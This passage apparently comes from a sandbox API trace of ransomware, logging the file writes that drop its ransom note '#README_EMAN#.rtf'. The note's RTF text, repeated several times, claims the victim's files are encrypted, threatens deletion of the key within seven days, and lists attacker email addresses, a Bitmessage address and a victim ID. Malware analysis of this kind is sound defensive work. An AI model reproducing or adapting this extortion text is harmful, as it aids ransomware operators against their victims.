\\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.917] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9b08, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\r", lpUsedDefaultChar=0x0) returned 8717 [0294.917] WriteFile (in: hFile=0x2ec, lpBuffer=0x1ef9b08*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9b08*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0294.918] CloseHandle (hObject=0x2ec) returned 1 [0294.918] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\#readme_eman#.rtf")) returned 0xffffffff [0294.918] GetLastError () returned 0x2 [0294.918] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0294.919] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s 